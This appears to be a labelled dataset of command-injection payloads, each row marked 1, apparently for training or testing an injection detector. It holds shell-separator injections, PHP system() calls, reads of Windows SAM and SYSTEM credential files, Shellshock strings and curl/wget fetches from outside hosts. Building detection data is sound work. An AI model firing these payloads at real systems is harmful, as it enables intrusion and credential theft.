sentence
string
Label
int64
&& sysinfo
1
system('cat C:\boot.ini');
1
system('cat config.php');
1
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
1
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
1
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
1
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
1
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
1
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
1
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
1
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
1
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
1
systeminfo
1
| systeminfo
1
; systeminfo
1
& systeminfo
1
&& systeminfo
1
system('ls')
1
system('pwd')
1
system('pwd');
1
|| system('sleep 5');
1
| system('sleep 5');
1
; system('sleep 5');
1
& system('sleep 5');
1
&& system('sleep 5');
1
system('sleep 5')
1
system('sleep 5');
1
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
1
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
1
system('whoami')
1
system('whoami');
1
test*; ls -lhtR /var/www/
1
test* || perl -e 'print "X"x16096'
1
test* | perl -e 'print "X"x16096'
1
test* & perl -e 'print "X"x16096'
1
test* && perl -e 'print "X"x16096'
1
test*; perl -e 'print "X"x16096'
1
$(`type C:\boot.ini`)
1
&&type C:\\boot.ini
1
| type C:\Windows\repair\SAM
1
; type C:\Windows\repair\SAM
1
& type C:\Windows\repair\SAM
1
&& type C:\Windows\repair\SAM
1
type C:\Windows\repair\SAM
1
| type C:\Windows\repair\SYSTEM
1
; type C:\Windows\repair\SYSTEM
1
& type C:\Windows\repair\SYSTEM
1
&& type C:\Windows\repair\SYSTEM
1
type C:\Windows\repair\SYSTEM
1
| type C:\WINNT\repair\SAM
1
; type C:\WINNT\repair\SAM
1
& type C:\WINNT\repair\SAM
1
&& type C:\WINNT\repair\SAM
1
type C:\WINNT\repair\SAM
1
type C:\WINNT\repair\SYSTEM
1
| type %SYSTEMROOT%\repair\SAM
1
; type %SYSTEMROOT%\repair\SAM
1
& type %SYSTEMROOT%\repair\SAM
1
&& type %SYSTEMROOT%\repair\SAM
1
type %SYSTEMROOT%\repair\SAM
1
| type %SYSTEMROOT%\repair\SYSTEM
1
; type %SYSTEMROOT%\repair\SYSTEM
1
& type %SYSTEMROOT%\repair\SYSTEM
1
&& type %SYSTEMROOT%\repair\SYSTEM
1
type %SYSTEMROOT%\repair\SYSTEM
1
uname
1
;uname;
1
| uname -a
1
; uname -a
1
& uname -a
1
&& uname -a
1
uname -a
1
|/usr/bin/id
1
;|/usr/bin/id|
1
;/usr/bin/id|
1
$;/usr/bin/id
1
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
1
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
1
| wget http://crowdshield.com/.testing/rce.txt
1
& wget http://crowdshield.com/.testing/rce.txt
1
; wget https://crowdshield.com/.testing/rce_vuln.txt
1
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
1
&& wget https://crowdshield.com/.testing/rce_vuln.txt
1
wget https://crowdshield.com/.testing/rce_vuln.txt
1
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
1
which curl
1
which gcc
1
which nc
1
which netcat
1
which perl
1
which python
1
which wget
1
whoami
1
| whoami
1
; whoami
1
' whoami
1
' || whoami
1
' & whoami
1
' && whoami
1
'; whoami
1